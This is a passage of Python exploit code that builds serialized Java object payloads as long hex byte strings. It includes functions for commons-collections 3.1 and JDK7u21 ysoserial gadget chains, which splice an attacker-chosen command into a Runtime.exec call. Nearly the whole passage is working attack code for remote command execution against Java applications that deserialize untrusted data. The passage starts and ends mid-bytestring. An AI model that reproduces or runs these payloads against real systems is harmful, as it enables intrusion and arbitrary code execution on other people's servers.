\x74\x65\x72\x61\x74\x6F\x72\x01\x00\x35\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\
\x70\x61\x63\x68\x65\x2F\x78\x6D\x6C\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x64\x74\x6D\x2F\x44\
\x54\x4D\x41\x78\x69\x73\x49\x74\x65\x72\x61\x74\x6F\x72\x3B\x01\x00\x07\x68\x61\x6E\x64\x6C\x65\
\x72\x01\x00\x41\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\
\x78\x6D\x6C\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x73\x65\x72\x69\x61\x6C\x69\x7A\x65\x72\x2F\
\x53\x65\x72\x69\x61\x6C\x69\x7A\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x3B\x01\x00\x0A\
\x53\x6F\x75\x72\x63\x65\x46\x69\x6C\x65\x01\x00\x0C\x47\x61\x64\x67\x65\x74\x73\x2E\x6A\x61\x76\
\x61\x0C\x00\x0A\x00\x0B\x07\x00\x28\x01\x00\x33\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x70\x61\
\x79\x6C\x6F\x61\x64\x73\x2F\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\x65\x74\x73\x24\x53\x74\x75\x62\
\x54\x72\x61\x6E\x73\x6C\x65\x74\x50\x61\x79\x6C\x6F\x61\x64\x01\x00\x40\x63\x6F\x6D\x2F\x73\x75\
\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\x2F\x69\x6E\x74\x65\x72\
\x6E\x61\x6C\x2F\x78\x73\x6C\x74\x63\x2F\x72\x75\x6E\x74\x69\x6D\x65\x2F\x41\x62\x73\x74\x72\x61\
\x63\x74\x54\x72\x61\x6E\x73\x6C\x65\x74\x01\x00\x14\x6A\x61\x76\x61\x2F\x69\x6F\x2F\x53\x65\x72\
\x69\x61\x6C\x69\x7A\x61\x62\x6C\x65\x01\x00\x39\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\
\x61\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x78\x73\
\x6C\x74\x63\x2F\x54\x72\x61\x6E\x73\x6C\x65\x74\x45\x78\x63\x65\x70\x74\x69\x6F\x6E\x01\x00\x1F\
\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x70\x61\x79\x6C\x6F\x61\x64\x73\x2F\x75\x74\x69\x6C\x2F\
\x47\x61\x64\x67\x65\x74\x73\x01\x00\x08\x3C\x63\x6C\x69\x6E\x69\x74\x3E\x01\x00\x11\x6A\x61\x76\
\x61\x2F\x6C\x61\x6E\x67\x2F\x52\x75\x6E\x74\x69\x6D\x65\x07\x00\x2A\x01\x00\x0A\x67\x65\x74\x52\
\x75\x6E\x74\x69\x6D\x65\x01\x00\x15\x28\x29\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x52\x75\
\x6E\x74\x69\x6D\x65\x3B\x0C\x00\x2C\x00\x2D\x0A\x00\x2B\x00\x2E\x01\x00")
# if running in python 3
if version_info[0] >= 3:
payload_commons_collection += (bytes(chr(len(cmd)), 'utf-8'))
payload_commons_collection += (bytes(cmd, 'utf-8'))
else:
payload_commons_collection += (chr(len(cmd)))
payload_commons_collection += (cmd)
payload_commons_collection += (b"\x08\x00\x30\x01\x00\x04\x65\x78\x65\x63\x01\x00\x27\x28\
\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B\x29\x4C\x6A\x61\x76\x61\
\x2F\x6C\x61\x6E\x67\x2F\x50\x72\x6F\x63\x65\x73\x73\x3B\x0C\x00\x32\x00\x33\x0A\x00\x2B\x00\x34\
\x01\x00\x1E\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x50\x77\x6E\x65\x72\x31\x31\x35\x36\x36\x35\
\x39\x33\x37\x38\x38\x36\x33\x30\x39\x01\x00\x20\x4C\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x50\
\x77\x6E\x65\x72\x31\x31\x35\x36\x36\x35\x39\x33\x37\x38\x38\x36\x33\x30\x39\x3B\x00\x21\x00\x02\
\x00\x03\x00\x01\x00\x04\x00\x01\x00\x1A\x00\x05\x00\x06\x00\x01\x00\x07\x00\x00\x00\x02\x00\x08\
\x00\x04\x00\x01\x00\x0A\x00\x0B\x00\x01\x00\x0C\x00\x00\x00\x2F\x00\x01\x00\x01\x00\x00\x00\x05\
\x2A\xB7\x00\x01\xB1\x00\x00\x00\x02\x00\x0D\x00\x00\x00\x06\x00\x01\x00\x00\x00\x2E\x00\x0E\x00\
\x00\x00\x0C\x00\x01\x00\x00\x00\x05\x00\x0F\x00\x37\x00\x00\x00\x01\x00\x13\x00\x14\x00\x02\x00\
\x0C\x00\x00\x00\x3F\x00\x00\x00\x03\x00\x00\x00\x01\xB1\x00\x00\x00\x02\x00\x0D\x00\x00\x00\x06\
\x00\x01\x00\x00\x00\x33\x00\x0E\x00\x00\x00\x20\x00\x03\x00\x00\x00\x01\x00\x0F\x00\x37\x00\x00\
\x00\x00\x00\x01\x00\x15\x00\x16\x00\x01\x00\x00\x00\x01\x00\x17\x00\x18\x00\x02\x00\x19\x00\x00\
\x00\x04\x00\x01\x00\x1A\x00\x01\x00\x13\x00\x1B\x00\x02\x00\x0C\x00\x00\x00\x49\x00\x00\x00\x04\
\x00\x00\x00\x01\xB1\x00\x00\x00\x02\x00\x0D\x00\x00\x00\x06\x00\x01\x00\x00\x00\x37\x00\x0E\x00\
\x00\x00\x2A\x00\x04\x00\x00\x00\x01\x00\x0F\x00\x37\x00\x00\x00\x00\x00\x01\x00\x15\x00\x16\x00\
\x01\x00\x00\x00\x01\x00\x1C\x00\x1D\x00\x02\x00\x00\x00\x01\x00\x1E\x00\x1F\x00\x03\x00\x19\x00\
\x00\x00\x04\x00\x01\x00\x1A\x00\x08\x00\x29\x00\x0B\x00\x01\x00\x0C\x00\x00\x00\x1B\x00\x03\x00\
\x02\x00\x00\x00\x0F\xA7\x00\x03\x01\x4C\xB8\x00\x2F\x12\x31\xB6\x00\x35\x57\xB1\x00\x00\x00\x00\
\x00\x02\x00\x20\x00\x00\x00\x02\x00\x21\x00\x11\x00\x00\x00\x0A\x00\x01\x00\x02\x00\x23\x00\x10\
\x00\x09\x75\x71\x00\x7E\x00\x1F\x00\x00\x01\xD4\xCA\xFE\xBA\xBE\x00\x00\x00\x31\x00\x1B\x0A\x00\
\x03\x00\x15\x07\x00\x17\x07\x00\x18\x07\x00\x19\x01\x00\x10\x73\x65\x72\x69\x61\x6C\x56\x65\x72\
\x73\x69\x6F\x6E\x55\x49\x44\x01\x00\x01\x4A\x01\x00\x0D\x43\x6F\x6E\x73\x74\x61\x6E\x74\x56\x61\
\x6C\x75\x65\x05\x71\xE6\x69\xEE\x3C\x6D\x47\x18\x01\x00\x06\x3C\x69\x6E\x69\x74\x3E\x01\x00\x03\
\x28\x29\x56\x01\x00\x04\x43\x6F\x64\x65\x01\x00\x0F\x4C\x69\x6E\x65\x4E\x75\x6D\x62\x65\x72\x54\
\x61\x62\x6C\x65\x01\x00\x12\x4C\x6F\x63\x61\x6C\x56\x61\x72\x69\x61\x62\x6C\x65\x54\x61\x62\x6C\
\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00\x03\x46\x6F\x6F\x01\x00\x0C\x49\x6E\x6E\x65\x72\x43\x6C\
\x61\x73\x73\x65\x73\x01\x00\x25\x4C\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x70\x61\x79\x6C\x6F\
\x61\x64\x73\x2F\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\x65\x74\x73\x24\x46\x6F\x6F\x3B\x01\x00\x0A\
\x53\x6F\x75\x72\x63\x65\x46\x69\x6C\x65\x01\x00\x0C\x47\x61\x64\x67\x65\x74\x73\x2E\x6A\x61\x76\
\x61\x0C\x00\x0A\x00\x0B\x07\x00\x1A\x01\x00\x23\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x70\x61\
\x79\x6C\x6F\x61\x64\x73\x2F\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\x65\x74\x73\x24\x46\x6F\x6F\x01\
\x00\x10\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x01\x00\x14\x6A\x61\x76\
\x61\x2F\x69\x6F\x2F\x53\x65\x72\x69\x61\x6C\x69\x7A\x61\x62\x6C\x65\x01\x00\x1F\x79\x73\x6F\x73\
\x65\x72\x69\x61\x6C\x2F\x70\x61\x79\x6C\x6F\x61\x64\x73\x2F\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\
\x65\x74\x73\x00\x21\x00\x02\x00\x03\x00\x01\x00\x04\x00\x01\x00\x1A\x00\x05\x00\x06\x00\x01\x00\
\x07\x00\x00\x00\x02\x00\x08\x00\x01\x00\x01\x00\x0A\x00\x0B\x00\x01\x00\x0C\x00\x00\x00\x2F\x00\
\x01\x00\x01\x00\x00\x00\x05\x2A\xB7\x00\x01\xB1\x00\x00\x00\x02\x00\x0D\x00\x00\x00\x06\x00\x01\
\x00\x00\x00\x3B\x00\x0E\x00\x00\x00\x0C\x00\x01\x00\x00\x00\x05\x00\x0F\x00\x12\x00\x00\x00\x02\
\x00\x13\x00\x00\x00\x02\x00\x14\x00\x11\x00\x00\x00\x0A\x00\x01\x00\x02\x00\x16\x00\x10\x00\x09\
\x70\x74\x00\x04\x50\x77\x6E\x72\x70\x77\x01\x00\x78\x75\x72\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2E\
\x6C\x61\x6E\x67\x2E\x43\x6C\x61\x73\x73\x3B\xAB\x16\xD7\xAE\xCB\xCD\x5A\x99\x02\x00\x00\x78\x70\
\x00\x00\x00\x01\x76\x72\x00\x1D\x6A\x61\x76\x61\x78\x2E\x78\x6D\x6C\x2E\x74\x72\x61\x6E\x73\x66\
\x6F\x72\x6D\x2E\x54\x65\x6D\x70\x6C\x61\x74\x65\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x78\x70\x77\x04\x00\x00\x00\x03\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x49\x6E\
\x74\x65\x67\x65\x72\x12\xE2\xA0\xA4\xF7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6C\x75\x65\
\x78\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4E\x75\x6D\x62\x65\x72\x86\xAC\x95\x1D\
\x0B\x94\xE0\x8B\x02\x00\x00\x78\x70\x00\x00\x00\x01\x71\x00\x7E\x00\x29\x78")
return payload_commons_collection
def generate_commons_collections31_payload(cmd):
# commons-collections 3.1
payload_commons_collection = (
b"\xAC\xED\x00\x05\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x48\x61\x73\x68\x53\
\x65\x74\xBA\x44\x85\x95\x96\xB8\xB7\x34\x03\x00\x00\x78\x70\x77\x0C\x00\x00\x00\x02\x3F\x40\x00\
\x00\x00\x00\x00\x01\x73\x72\x00\x34\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\
\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x6B\x65\x79\x76\x61\x6C\x75\x65\
\x2E\x54\x69\x65\x64\x4D\x61\x70\x45\x6E\x74\x72\x79\x8A\xAD\xD2\x9B\x39\xC1\x1F\xDB\x02\x00\x02\
\x4C\x00\x03\x6B\x65\x79\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\
\x63\x74\x3B\x4C\x00\x03\x6D\x61\x70\x74\x00\x0F\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\x2F\x4D\
\x61\x70\x3B\x78\x70\x74\x00\x26\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x69\x74\x68\x75\x62\x2E\x63\
\x6F\x6D\x2F\x6A\x6F\x61\x6F\x6D\x61\x74\x6F\x73\x66\x2F\x6A\x65\x78\x62\x6F\x73\x73\x20\x73\x72\
\x00\x2A\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\
\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x6D\x61\x70\x2E\x4C\x61\x7A\x79\x4D\x61\x70\x6E\xE5\x94\x82\
\x9E\x79\x10\x94\x03\x00\x01\x4C\x00\x07\x66\x61\x63\x74\x6F\x72\x79\x74\x00\x2C\x4C\x6F\x72\x67\
\x2F\x61\x70\x61\x63\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C\x6C\x65\x63\x74\x69\
\x6F\x6E\x73\x2F\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x3B\x78\x70\x73\x72\x00\x3A\x6F\x72\
\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\
\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x43\x68\x61\x69\x6E\x65\x64\x54\x72\x61\
\x6E\x73\x66\x6F\x72\x6D\x65\x72\x30\xC7\x97\xEC\x28\x7A\x97\x04\x02\x00\x01\x5B\x00\x0D\x69\x54\
\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x73\x74\x00\x2D\x5B\x4C\x6F\x72\x67\x2F\x61\x70\x61\x63\
\x68\x65\x2F\x63\x6F\x6D\x6D\x6F\x6E\x73\x2F\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2F\x54\
\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x3B\x78\x70\x75\x72\x00\x2D\x5B\x4C\x6F\x72\x67\x2E\x61\
\x70\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\
\x73\x2E\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x3B\xBD\x56\x2A\xF1\xD8\x34\x18\x99\x02\x00\
\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3B\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x63\x6F\
\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\x2E\x66\x75\x6E\x63\x74\x6F\
\x72\x73\x2E\x43\x6F\x6E\x73\x74\x61\x6E\x74\x54\x72\x61\x6E\x73\x66\x6F\x72\x6D\x65\x72\x58\x76\
\x90\x11\x41\x02\xB1\x94\x02\x00\x01\x4C\x00\x09\x69\x43\x6F\x6E\x73\x74\x61\x6E\x74\x71\x00\x7E\
\x00\x03\x78\x70\x76\x72\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x52\x75\x6E\x74\x69\x6D\
\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3A\x6F\x72\x67\x2E\x61\x70\
\x61\x63\x68\x65\x2E\x63\x6F\x6D\x6D\x6F\x6E\x73\x2E\x63\x6F\x6C\x6C\x65\x63\x74\x69\x6F\x6E\x73\
\x2E\x66\x75\x6E\x63\x74\x6F\x72\x73\x2E\x49\x6E\x76\x6F\x6B\x65\x72\x54\x72\x61\x6E\x73\x66\x6F\
\x72\x6D\x65\x72\x87\xE8\xFF\x6B\x7B\x7C\xCE\x38\x02\x00\x03\x5B\x00\x05\x69\x41\x72\x67\x73\x74\
\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x4F\x62\x6A\x65\x63\x74\x3B\x4C\x00\x0B\
\x69\x4D\x65\x74\x68\x6F\x64\x4E\x61\x6D\x65\x74\x00\x12\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\
\x2F\x53\x74\x72\x69\x6E\x67\x3B\x5B\x00\x0B\x69\x50\x61\x72\x61\x6D\x54\x79\x70\x65\x73\x74\x00\
\x12\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73\x3B\x78\x70\x75\x72\x00\
\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63\x74\x3B\x90\xCE\x58\x9F\
\x10\x73\x29\x6C\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0A\x67\x65\x74\x52\x75\x6E\x74\x69\
\x6D\x65\x75\x72\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x43\x6C\x61\x73\x73\x3B\
\xAB\x16\xD7\xAE\xCB\xCD\x5A\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4D\
\x65\x74\x68\x6F\x64\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x02\x76\x72\x00\x10\x6A\x61\x76\x61\x2E\
\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\xA0\xF0\xA4\x38\x7A\x3B\xB3\x42\x02\x00\x00\x78\x70\
\x76\x71\x00\x7E\x00\x1B\x73\x71\x00\x7E\x00\x13\x75\x71\x00\x7E\x00\x18\x00\x00\x00\x02\x70\x75\
\x71\x00\x7E\x00\x18\x00\x00\x00\x00\x74\x00\x06\x69\x6E\x76\x6F\x6B\x65\x75\x71\x00\x7E\x00\x1B\
\x00\x00\x00\x02\x76\x72\x00\x10\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4F\x62\x6A\x65\x63\x74\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7E\x00\x18\x73\x71\x00\x7E\x00\
\x13\x75\x72\x00\x13\x5B\x4C\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x53\x74\x72\x69\x6E\x67\x3B\
\xAD\xD2\x56\xE7\xE9\x1D\x7B\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00")
# if running in python 3
if version_info[0] >= 3:
payload_commons_collection += (bytes(chr(len(cmd)), 'utf-8'))
payload_commons_collection += (bytes(cmd, 'utf-8'))
else:
payload_commons_collection += (chr(len(cmd)))
payload_commons_collection += (cmd)
payload_commons_collection += (
b"\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7E\x00\x1B\x00\x00\x00\x01\x71\x00\x7E\x00\x20\x73\x71\x00\
\x7E\x00\x0F\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x49\x6E\x74\x65\x67\x65\x72\
\x12\xE2\xA0\xA4\xF7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6C\x75\x65\x78\x72\x00\x10\x6A\
\x61\x76\x61\x2E\x6C\x61\x6E\x67\x2E\x4E\x75\x6D\x62\x65\x72\x86\xAC\x95\x1D\x0B\x94\xE0\x8B\x02\
\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72\x00\x11\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x48\x61\
\x73\x68\x4D\x61\x70\x05\x07\xDA\xC1\xC3\x16\x60\xD1\x03\x00\x02\x46\x00\x0A\x6C\x6F\x61\x64\x46\
\x61\x63\x74\x6F\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6F\x6C\x64\x78\x70\x3F\x40\x00\x00\x00\
\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x78")
return payload_commons_collection
def generate_jdk7u21_payload(cmd):
# improved from frohoff version
payload = (b"\xAC\xED\x00\x05\x73\x72\x00\x17\x6A\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x4C\x69\x6E\x6B\x65\
\x64\x48\x61\x73\x68\x53\x65\x74\xD8\x6C\xD7\x5A\x95\xDD\x2A\x1E\x02\x00\x00\x78\x72\x00\x11\x6A\
\x61\x76\x61\x2E\x75\x74\x69\x6C\x2E\x48\x61\x73\x68\x53\x65\x74\xBA\x44\x85\x95\x96\xB8\xB7\x34\
\x03\x00\x00\x78\x70\x77\x0C\x00\x00\x00\x10\x3F\x40\x00\x00\x00\x00\x00\x02\x73\x72\x00\x3A\x63\
\x6F\x6D\x2E\x73\x75\x6E\x2E\x6F\x72\x67\x2E\x61\x70\x61\x63\x68\x65\x2E\x78\x61\x6C\x61\x6E\x2E\
\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2E\x78\x73\x6C\x74\x63\x2E\x74\x72\x61\x78\x2E\x54\x65\x6D\x70\
\x6C\x61\x74\x65\x73\x49\x6D\x70\x6C\x09\x57\x4F\xC1\x6E\xAC\xAB\x33\x03\x00\x08\x49\x00\x0D\x5F\
\x69\x6E\x64\x65\x6E\x74\x4E\x75\x6D\x62\x65\x72\x49\x00\x0E\x5F\x74\x72\x61\x6E\x73\x6C\x65\x74\
\x49\x6E\x64\x65\x78\x5A\x00\x15\x5F\x75\x73\x65\x53\x65\x72\x76\x69\x63\x65\x73\x4D\x65\x63\x68\
\x61\x6E\x69\x73\x6D\x4C\x00\x0B\x5F\x61\x75\x78\x43\x6C\x61\x73\x73\x65\x73\x74\x00\x3B\x4C\x63\
\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\x2F\
\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x78\x73\x6C\x74\x63\x2F\x72\x75\x6E\x74\x69\x6D\x65\x2F\x48\
\x61\x73\x68\x74\x61\x62\x6C\x65\x3B\x5B\x00\x0A\x5F\x62\x79\x74\x65\x63\x6F\x64\x65\x73\x74\x00\
\x03\x5B\x5B\x42\x5B\x00\x06\x5F\x63\x6C\x61\x73\x73\x74\x00\x12\x5B\x4C\x6A\x61\x76\x61\x2F\x6C\
\x61\x6E\x67\x2F\x43\x6C\x61\x73\x73\x3B\x4C\x00\x05\x5F\x6E\x61\x6D\x65\x74\x00\x12\x4C\x6A\x61\
\x76\x61\x2F\x6C\x61\x6E\x67\x2F\x53\x74\x72\x69\x6E\x67\x3B\x4C\x00\x11\x5F\x6F\x75\x74\x70\x75\
\x74\x50\x72\x6F\x70\x65\x72\x74\x69\x65\x73\x74\x00\x16\x4C\x6A\x61\x76\x61\x2F\x75\x74\x69\x6C\
\x2F\x50\x72\x6F\x70\x65\x72\x74\x69\x65\x73\x3B\x78\x70\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x70\
\x75\x72\x00\x03\x5B\x5B\x42\x4B\xFD\x19\x15\x67\x67\xDB\x37\x02\x00\x00\x78\x70\x00\x00\x00\x02\
\x75\x72\x00\x02\x5B\x42\xAC\xF3\x17\xF8\x06\x08\x54\xE0\x02\x00\x00\x78\x70\x00\x00\x06")
if version_info[0] >= 3:
payload += (bytes(chr(len(cmd)+131), 'utf-8'))
else:
payload += (chr(len(cmd)+131))
payload += (b"\xCA\xFE\xBA\xBE\x00\x00\
\x00\x31\x00\x38\x0A\x00\x03\x00\x22\x07\x00\x36\x07\x00\x25\x07\x00\x26\x01\
\x00\x10\x73\x65\x72\x69\x61\x6C\x56\x65\x72\x73\x69\x6F\x6E\x55\x49\x44\x01\x00\x01\x4A\x01\x00\
\x0D\x43\x6F\x6E\x73\x74\x61\x6E\x74\x56\x61\x6C\x75\x65\x05\xAD\x20\x93\xF3\x91\xDD\xEF\x3E\x01\
\x00\x06\x3C\x69\x6E\x69\x74\x3E\x01\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6F\x64\x65\x01\x00\x0F\
\x4C\x69\x6E\x65\x4E\x75\x6D\x62\x65\x72\x54\x61\x62\x6C\x65\x01\x00\x12\x4C\x6F\x63\x61\x6C\x56\
\x61\x72\x69\x61\x62\x6C\x65\x54\x61\x62\x6C\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00\x13\x53\x74\
\x75\x62\x54\x72\x61\x6E\x73\x6C\x65\x74\x50\x61\x79\x6C\x6F\x61\x64\x01\x00\x0C\x49\x6E\x6E\x65\
\x72\x43\x6C\x61\x73\x73\x65\x73\x01\x00\x35\x4C\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x70\x61\
\x79\x6C\x6F\x61\x64\x73\x2F\x75\x74\x69\x6C\x2F\x47\x61\x64\x67\x65\x74\x73\x24\x53\x74\x75\x62\
\x54\x72\x61\x6E\x73\x6C\x65\x74\x50\x61\x79\x6C\x6F\x61\x64\x3B\x01\x00\x09\x74\x72\x61\x6E\x73\
\x66\x6F\x72\x6D\x01\x00\x72\x28\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\
\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x78\x73\x6C\x74\x63\
\x2F\x44\x4F\x4D\x3B\x5B\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\
\x65\x2F\x78\x6D\x6C\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x73\x65\x72\x69\x61\x6C\x69\x7A\x65\
\x72\x2F\x53\x65\x72\x69\x61\x6C\x69\x7A\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x3B\x29\
\x56\x01\x00\x08\x64\x6F\x63\x75\x6D\x65\x6E\x74\x01\x00\x2D\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\
\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\x2F\x69\x6E\x74\x65\x72\x6E\x61\
\x6C\x2F\x78\x73\x6C\x74\x63\x2F\x44\x4F\x4D\x3B\x01\x00\x08\x68\x61\x6E\x64\x6C\x65\x72\x73\x01\
\x00\x42\x5B\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\
\x6D\x6C\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x73\x65\x72\x69\x61\x6C\x69\x7A\x65\x72\x2F\x53\
\x65\x72\x69\x61\x6C\x69\x7A\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x3B\x01\x00\x0A\x45\
\x78\x63\x65\x70\x74\x69\x6F\x6E\x73\x07\x00\x27\x01\x00\xA6\x28\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\
\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x61\x6C\x61\x6E\x2F\x69\x6E\x74\x65\x72\x6E\
\x61\x6C\x2F\x78\x73\x6C\x74\x63\x2F\x44\x4F\x4D\x3B\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\
\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x6D\x6C\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x64\x74\
\x6D\x2F\x44\x54\x4D\x41\x78\x69\x73\x49\x74\x65\x72\x61\x74\x6F\x72\x3B\x4C\x63\x6F\x6D\x2F\x73\
\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x6D\x6C\x2F\x69\x6E\x74\x65\x72\x6E\
\x61\x6C\x2F\x73\x65\x72\x69\x61\x6C\x69\x7A\x65\x72\x2F\x53\x65\x72\x69\x61\x6C\x69\x7A\x61\x74\
\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x3B\x29\x56\x01\x00\x08\x69\x74\x65\x72\x61\x74\x6F\x72\
\x01\x00\x35\x4C\x63\x6F\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\
\x6D\x6C\x2F\x69\x6E\x74\x65\x72\x6E\x61\x6C\x2F\x64\x74\x6D\x2F\x44\x54\x4D\x41\x78\x69\x73\x49\
\x74\x65\x72\x61\x74\x6F\x72\x3B\x01\x00\x07\x68\x61\x6E\x64\x6C\x65\x72\x01\x00\x41\x4C\x63\x6F\
\x6D\x2F\x73\x75\x6E\x2F\x6F\x72\x67\x2F\x61\x70\x61\x63\x68\x65\x2F\x78\x6D\x6C\x2F\x69\x6E\x74\
\x65\x72\x6E\x61\x6C\x2F\x73\x65\x72\x69\x61\x6C\x69\x7A\x65\x72\x2F\x53\x65\x72\x69\x61\x6C\x69\
\x7A\x61\x74\x69\x6F\x6E\x48\x61\x6E\x64\x6C\x65\x72\x3B\x01\x00\x0A\x53\x6F\x75\x72\x63\x65\x46\
\x69\x6C\x65\x01\x00\x0C\x47\x61\x64\x67\x65\x74\x73\x2E\x6A\x61\x76\x61\x0C\x00\x0A\x00\x0B\x07\
\x00\x28\x01\x00\x33\x79\x73\x6F\x73\x65\x72\x69\x61\x6C\x2F\x70\x61\x79\x6C\x6F\x61\x64\x73\x2F\
